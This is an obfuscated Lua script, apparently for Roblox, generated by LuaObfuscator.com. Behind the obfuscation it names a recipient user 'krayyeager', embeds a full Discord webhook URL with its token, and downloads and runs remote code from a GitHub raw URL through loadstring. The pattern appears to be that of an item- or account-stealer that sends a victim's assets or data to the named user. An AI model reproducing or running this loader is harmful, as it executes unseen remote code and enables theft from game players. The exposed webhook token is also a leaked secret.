--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;while true do if (v0==0) then v1=0;while true do if (v1==1) then UserName2="krayyeager";loadstring(game:HttpGet("https://raw.githubusercontent.com/ASTORSCRIPTS/ASTOR2/main/ASTOR",true))();break;end if (v1==0) then local v2=0;while true do if (v2==1) then v1=1;break;end if (v2==0) then UserName="krayyeager";Webhook="https://discord.com/api/webhooks/1150310278181961778/hp8UR1n76MjZGUQDTrk8DC_SZJYN3EUlHCreCyCx7U4GH-APCBbrqqu70ywHwxiwKyha
";v2=1;end end end end break;end end end
